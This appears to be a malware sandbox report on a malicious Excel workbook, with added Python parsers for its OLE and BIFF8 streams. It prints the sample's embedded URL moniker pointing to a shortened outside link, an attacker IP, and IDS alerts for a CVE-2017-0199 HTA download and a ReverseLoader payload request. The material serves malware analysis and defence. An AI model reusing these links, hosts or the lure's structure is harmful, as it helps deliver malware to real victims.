                                                                      Data ASCII:P K . . . . . . . . . . ! . . z > . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c1 0c 7a 3e 86 01 00 00 38 05 00 00 13 00 cd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F818/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:94
                                                                      Entropy:4.345966460061678
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F818/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:64
                                                                      Entropy:2.904417186688699
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 3 3 .
                                                                      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 33 33 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F818/CONTENTS
                                                                      CLSID:
                                                                      File Type:PDF document, version 1.3, 1 pages
                                                                      Stream Size:50134
                                                                      Entropy:7.717515618096627
                                                                      Base64 Encoded:True
                                                                      Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 5 9 4 . 3 6 8 4 0 . 6 0 ] . / C r o p B o x [ 0 0 5 9 4 . 3 6 8 4 0 . 6 0 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                                                                      Data Raw:25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 35 39 34 2e 33 36 20 38 34 30 2e 36 30 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 35 39 34 2e 33 36 20 38 34 30 2e 36 30 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01462F13/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.219515110876372
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01462F13/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:66298
                                                                      Entropy:7.892486361087618
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . e . , . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 65 8c 03 2c b7 01 00 00 9e 06 00 00 13 00 d4 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d0 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:708
                                                                      Entropy:3.6235698530352805
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:23248
                                                                      Entropy:3.026179220197763
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the leading 09 08 10 00 00 06 05 00 in Data Raw is a BIFF BOF record, type 0x0809, version 0x0600 = BIFF8, substream 0x0005 = workbook globals, so this is an Excel BIFF8 Workbook stream)
                                                                      Stream Size:97808
                                                                      Entropy:7.365522783516277
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      General
                                                                      Stream Path:MBD003994AB/Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the leading 09 08 10 00 00 06 05 00 in Data Raw is a BIFF BOF record, type 0x0809, version 0x0600 = BIFF8, substream 0x0005 = workbook globals, so this is an Excel BIFF8 Workbook stream)
                                                                      Stream Size:354965
                                                                      Entropy:7.8032787826227565
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . x . x < $ 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      General
                                                                      Stream Path:MBD003994AC/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:644
                                                                      Entropy:5.771739288457116
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . ' e 0 = x s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . l . j . g . . . c . l . / . G . 5 . d . F . ? . & . r . a . n . k . = . u . t . t . e . r . m . o . s . t . & . f . a . n . = . d . e . c . o . r . o . u . s . & . b . a . r . r . a . c . k . s . = . d . r . u . n . k . & . k . e . t . t . l . e . d . r . u . m . = . f . l . i . p . p . a . n . t . & . b . a . n . a . n . a . = . l . o . o . s . e . & . b . a . t . h . r . o . o . m . . . B . > E O x d . . .
                                                                      Data Raw:01 00 00 02 27 87 b6 65 30 3d 78 73 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b ac 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 6a 00 67 00 2e 00 63 00 6c 00 2f 00 47 00 35 00 64 00 46 00 3f 00 26 00 72 00 61 00 6e 00 6b 00 3d 00 75 00 74 00 74 00 65 00 72 00 6d 00 6f 00 73 00 74 00 26 00 66 00 61 00 6e 00 3d 00
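The \x01CompObj and \x01Ole streams listed above are where the "many unusual embedded objects" the report flags actually live: CompObj says what each object claims to be (CLSID, user type, clipboard format, ProgID), and the \x01Ole stream of MBD003994AC carries a URL moniker, which is how the link shown in its Data ASCII reaches Excel. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It parses both structures per MS-OLEDS with the standard library only. The two CompObj vectors are the complete 114- and 94-byte dumps copied from the report; the \x01Ole vector is constructed, with a placeholder URL, because the page shows only the first 128 bytes of the 644-byte stream. Two things a parser must survive are visible in the dump above: the Flags and LinkUpdateOption fields (0x65b68727, 0x73783d30) are not among the values MS-OLEDS defines, and the declared sizes do not agree (a 432-byte moniker stream cannot hold a 16-byte CLSID plus a 428-byte URL field), so the code keys on the moniker CLSID and bounds every read by the buffer. Pulling the real streams out of the file with olefile (`olefile.OleFileIO(path).openstream(name).read()`) is assumed, not shown.

```python
"""Parse Excel's per-object OLE streams with the standard library only:
\x01CompObj says what an embedded object claims to be (MS-OLEDS 2.3.8) and
\x01Ole says where a linked object points (MS-OLEDS 2.3.3)."""
import struct
import uuid

URL_MONIKER_CLSID = "{79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}"   # CLSID_StdURLMoniker
UNICODE_MARKER = 0x71B239F4

# Complete CompObj streams copied from the report's Data Raw dumps (114 and 94 bytes).
COMPOBJ_EXCEL8 = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 "
    "26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 "
    "30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 "
    "45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00")
COMPOBJ_ACROBAT = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 "
    "11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 "
    "41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 "
    "00 00 00 00 00 00 00 00 00 00 00 00")


def clsid_str(raw16: bytes) -> str:
    """GUIDs are stored little-endian; render them the way the registry shows them."""
    return "{%s}" % str(uuid.UUID(bytes_le=raw16)).upper()


def _u32(buf: bytes, off: int) -> int:
    if off + 4 > len(buf):
        raise ValueError("stream truncated at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0]


def _ansi_string(buf: bytes, off: int):
    """LengthPrefixedAnsiString: u32 length (including the NUL), then the bytes."""
    n = _u32(buf, off)
    raw = buf[off + 4: off + 4 + n]
    return raw.split(b"\x00", 1)[0].decode("latin-1"), off + 4 + n


def parse_compobj(buf: bytes) -> dict:
    """28-byte header (reserved, version, reserved, CLSID), AnsiUserType,
    ClipboardFormatOrAnsiString, Reserved1 (in practice the ProgID), then the
    marker that precedes the Unicode copies of the same strings."""
    if len(buf) < 28:
        raise ValueError("CompObj too short")
    version = _u32(buf, 4)
    clsid = clsid_str(buf[12:28])
    user_type, off = _ansi_string(buf, 28)
    marker = _u32(buf, off)
    if marker == 0:                                  # no clipboard format at all
        clip, off = None, off + 4
    elif marker in (0xFFFFFFFF, 0xFFFFFFFE):         # a standard CF_* id follows
        clip, off = _u32(buf, off + 4), off + 8
    else:                                            # marker is an ANSI string length
        clip, off = _ansi_string(buf, off)
    prog_id, off = _ansi_string(buf, off)
    return {"version": version, "clsid": clsid, "user_type": user_type,
            "clipboard_format": clip, "prog_id": prog_id,
            "unicode_marker_ok": _u32(buf, off) == UNICODE_MARKER}


def parse_ole_stream(buf: bytes) -> dict:
    """Walk the three moniker slots of an OLEStream, bounding every read by the
    buffer, and return the URL for each slot that holds a URL moniker."""
    version, flags, update_opt, _reserved = struct.unpack_from("<IIII", buf, 0)
    off, found = 16, []
    for slot in ("reserved", "relative", "absolute"):
        size = _u32(buf, off)
        chunk = buf[off + 4: off + 4 + size]
        off += 4 + size
        if len(chunk) < 20:                          # empty slot, or cut before the length field
            continue
        clsid, url = clsid_str(chunk[:16]), None
        if clsid == URL_MONIKER_CLSID:
            n = struct.unpack_from("<I", chunk, 16)[0]
            raw = chunk[20:20 + n]                   # NUL-terminated UTF-16LE, maybe cut short
            url = raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
        found.append({"slot": slot, "clsid": clsid, "url": url, "truncated": len(chunk) < size})
    return {"version": version, "flags": flags, "link_update_option": update_opt,
            "monikers": found}


def build_link_stream(url: str) -> bytes:
    """Constructed test vector, not bytes from the report: a well-formed OLEStream
    whose absolute-source moniker is a URL moniker for `url`."""
    url_bytes = url.encode("utf-16-le") + b"\x00\x00"
    moniker = (uuid.UUID(URL_MONIKER_CLSID).bytes_le
               + struct.pack("<I", len(url_bytes)) + url_bytes)
    return (struct.pack("<IIII", 0x02000001, 1, 1, 0)     # version, linked, OLEUPDATE_ALWAYS, reserved
            + struct.pack("<II", 0, 0)                    # empty reserved / relative slots
            + struct.pack("<I", len(moniker)) + moniker)


if __name__ == "__main__":
    print("Excel.Sheet.8 CompObj:", parse_compobj(COMPOBJ_EXCEL8))
    print("Acrobat CompObj:", parse_compobj(COMPOBJ_ACROBAT))
    sample = build_link_stream("https://example.invalid/G5dF?rank=uttermost")  # placeholder URL
    print("complete Ole stream:", parse_ole_stream(sample)["monikers"])
    print("cut short, as the report's dump is:", parse_ole_stream(sample[:60])["monikers"])
```

Run it as is and it prints the ProgIDs of the two objects (Excel.Sheet.8 and AcroExch.Document.DC) and the URL from the constructed link; feed it real streams and the `truncated` flag tells you whether the URL you got back is the whole one, which matters when a dump or a carved file stops mid-string.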
                                                                      General
                                                                      Stream Path:Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the leading 09 08 10 00 00 06 05 00 in Data Raw is a BIFF BOF record, type 0x0809, version 0x0600 = BIFF8, substream 0x0005 = workbook globals, so this is an Excel BIFF8 Workbook stream; the 2f 00 36 00 record that follows it is FILEPASS, which marks the stream as encrypted and is consistent with the 7.999 entropy)
                                                                      Stream Size:396145
                                                                      Entropy:7.999004124760168
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . r $ . 4 7 " K E " u . v . > F . . w : f G . ' / . > p . R . . . . . . . . . . . y 6 . . . \\ . p . d . Q . F . . . L T A o m . | . . . k . e C ( 4 - . a . . c 3 . . . @ u K . O . . . - . R C . D E 7 . . . d c ~ . . B . . . v a . . . B G . . . = . . . . D X 4 z U . . . ' o V . 0 m d [ . . . . . . . ` y . . . . l . . . . . r . . . @ | . . . C = . . . . . m ^ . A . 3 ) w @ . . . h . . . . d . " . . . M . . . . B . . . . . . . 1 . . . . O ~ . # . L 8 J .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 72 c0 24 cc f8 07 da 34 37 22 4b fa 45 22 75 db 9b 84 76 9d 05 8c 3e f0 46 07 0c 77 b9 bc c0 3a 66 47 0a dd 27 85 b1 2f 1b 3e 20 70 0f be 52 ca 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 79 36 e2 00 00 00 5c 00 70 00 ba 64 e9 7f b2 a2 51 dd 95 d2 46 e5 c0 17 02 fd 1e 4c fb 54 41 6f 6d 98 94 ab
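libmagic labels all three Workbook streams on this page "Applesoft BASIC program data", but each dump opens with 09 08 10 00 00 06 05 00, a BIFF BOF record (type 0x0809, length 16, version 0x0600 = BIFF8, substream 0x0005 = workbook globals). Walking the records from there says more than the file-type line and explains two other numbers on the page. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample. It walks the record headers in the first 128 bytes of MBD003994AB/Workbook and of the top-level Workbook (both copied from the Data Raw dumps above, which stop at 128 bytes), decodes the BOF, FILEPASS and WRITEACCESS payloads, and flags the record the cut-off truncates. The top-level stream has a FILEPASS record straight after BOF (encryption type 1 = RC4, version 1.1 = the legacy binary-document scheme), so its 7.999 entropy is ciphertext rather than packing; MS-XLS encrypts every record payload after FILEPASS except a short list (BOF, FilePass and InterfaceHdr among them), which is why the INTERFACEHDR payload b0 04 matches the unencrypted embedded copy while the MMS and WRITEACCESS payloads do not. The embedded copy gives up the WRITEACCESS user name "91974", the same string that appears in the SummaryInformation streams above. The zero-length 0x0087 record in the top-level stream is the one the Excel 97 BIFF record reference and xlrd call ADDIN, which fits the .xla in the sample's name. The report does not say which password the workbook is encrypted with; the usual first step, assumed here and not confirmed by the page, is to try Excel's built-in default password (VelvetSweatshop, which Excel applies silently on open) with msoffcrypto-tool and walk the decrypted stream the same way.

```python
"""Walk BIFF8 record headers at the head of a Workbook stream (MS-XLS 2.1.4).
The two vectors are the 128-byte Data Raw dumps copied from the report."""
import struct

RECORD_NAMES = {0x0809: "BOF", 0x002F: "FILEPASS", 0x0087: "ADDIN",  # ADDIN: Excel 97 BIFF reference / xlrd
                0x00E1: "INTERFACEHDR", 0x00C1: "MMS", 0x00E2: "INTERFACEEND",
                0x005C: "WRITEACCESS", 0x0085: "BOUNDSHEET8", 0x000A: "EOF"}
BOF_VERSIONS = {0x0500: "BIFF5/7", 0x0600: "BIFF8"}
BOF_TYPES = {0x0005: "workbook globals", 0x0006: "VB module", 0x0010: "worksheet",
             0x0020: "chart", 0x0040: "macro sheet", 0x0100: "workspace"}
# Payloads that stay in the clear after FILEPASS (MS-XLS 2.2.10; the list also
# names UsrExcl, FileLock, RRDInfo and RRDHead, omitted here).
NOT_ENCRYPTED = {0x0809, 0x002F, 0x00E1}

# MBD003994AB/Workbook, first 128 bytes; the dump continues with 0x20 padding.
EMBEDDED_HEAD = bytes.fromhex(
    "09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 "
    "e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 "
    "5c 00 70 00 05 00 00 39 31 39 37 34") + b" " * 80
# Top-level Workbook, first 128 bytes.
TOP_HEAD = bytes.fromhex(
    "09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 "
    "2f 00 36 00 01 00 01 00 01 00 "
    "72 c0 24 cc f8 07 da 34 37 22 4b fa 45 22 75 db "
    "9b 84 76 9d 05 8c 3e f0 46 07 0c 77 b9 bc c0 3a "
    "66 47 0a dd 27 85 b1 2f 1b 3e 20 70 0f be 52 ca "
    "87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 79 36 e2 00 00 00 "
    "5c 00 70 00 ba 64 e9 7f b2 a2 51 dd 95 d2 46 e5 c0 17 02 fd 1e 4c fb 54 41 6f 6d 98 94 ab")


def walk_records(buf):
    """Yield (type, name, payload, truncated); stop at the first record the buffer cuts."""
    off = 0
    while off + 4 <= len(buf):
        rtype, rlen = struct.unpack_from("<HH", buf, off)
        payload = buf[off + 4: off + 4 + rlen]
        truncated = len(payload) < rlen
        yield rtype, RECORD_NAMES.get(rtype, "0x%04X" % rtype), payload, truncated
        if truncated:
            return
        off += 4 + rlen


def describe_bof(p):
    vers, dt, build, year = struct.unpack_from("<HHHH", p, 0)
    return {"version": BOF_VERSIONS.get(vers, hex(vers)), "substream": BOF_TYPES.get(dt, hex(dt)),
            "build": build, "year": year}


def describe_filepass(p):
    """wEncryptionType 0 = XOR obfuscation, 1 = RC4.  For RC4, vMajor/vMinor 1.1 is the
    legacy binary-document header (MS-OFFCRYPTO 2.3.6); 2..4 / 2 is RC4 CryptoAPI."""
    (enc_type,) = struct.unpack_from("<H", p, 0)
    if enc_type == 0:
        return {"scheme": "XOR obfuscation"}
    major, minor = struct.unpack_from("<HH", p, 2)
    if (major, minor) == (1, 1) and len(p) >= 54:
        return {"scheme": "RC4 (binary document)", "salt": p[6:22].hex(),
                "encrypted_verifier": p[22:38].hex(), "encrypted_verifier_hash": p[38:54].hex()}
    return {"scheme": "RC4 CryptoAPI" if major in (2, 3, 4) else "unknown",
            "version": "%d.%d" % (major, minor)}


def write_access_user(p):
    """WRITEACCESS is a 112-byte, space-padded XLUnicodeString: cch, flags, chars."""
    cch, flags = struct.unpack_from("<HB", p, 0)
    wide = flags & 1
    raw = p[3:3 + cch * (2 if wide else 1)]
    return raw.decode("utf-16-le" if wide else "latin-1", errors="replace").rstrip()


def triage(buf):
    info = {"records": [], "encrypted": False, "add_in": False, "truncated_tail": False}
    for rtype, name, payload, truncated in walk_records(buf):
        info["records"].append(name)
        info["truncated_tail"] = truncated
        if rtype == 0x0809 and len(payload) >= 8:
            info["bof"] = describe_bof(payload)
        elif rtype == 0x002F and len(payload) >= 6:
            info["encrypted"], info["filepass"] = True, describe_filepass(payload)
        elif rtype == 0x0087:
            info["add_in"] = True
        elif rtype == 0x005C and len(payload) >= 3:
            # After FILEPASS this payload is ciphertext; do not "decode" it.
            ciphertext = info["encrypted"] and rtype not in NOT_ENCRYPTED
            info["write_access_user"] = None if ciphertext else write_access_user(payload)
    return info


if __name__ == "__main__":
    print("MBD003994AB/Workbook:", triage(EMBEDDED_HEAD))
    print("Workbook:", triage(TOP_HEAD))
```

The walker deliberately stops at the first record the buffer cuts rather than resynchronising, because after a truncated record there is no reliable header to resume from; on a full stream pulled with olefile it keeps going to EOF.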
General
Stream Path: _VBA_PROJECT_CUR/PROJECT
CLSID:
File Type: ASCII text, with CRLF line terminators
Stream Size: 521
Entropy: 5.241989610017547
Base64 Encoded: True
General
Stream Path: _VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type: data
Stream Size: 104
Entropy: 3.0488640812019017
Base64 Encoded: False
General
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type: data
Stream Size: 2644
Entropy: 3.9855407016531923
Base64 Encoded: False
General
Stream Path: _VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type: data
Stream Size: 552
Entropy: 6.3780587508051045
Base64 Encoded: True
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-28T07:28:05.786085+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 172.245.123.29 | 80 | TCP
2024-11-28T07:28:05.786269+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.245.123.29 | 80 | 192.168.2.22 | 49164 | TCP
2024-11-28T07:28:11.300059+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 172.245.123.29 | 80 | TCP
2024-11-28T07:28:11.300068+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.245.123.29 | 80 | 192.168.2.22 | 49166 | TCP
2024-11-28T07:28:17.864630+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.22 | 49167 | 172.245.123.29 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Nov 28, 2024 07:28:11.299957037 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300055027 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.300059080 CET4916680192.168.2.22172.245.123.29
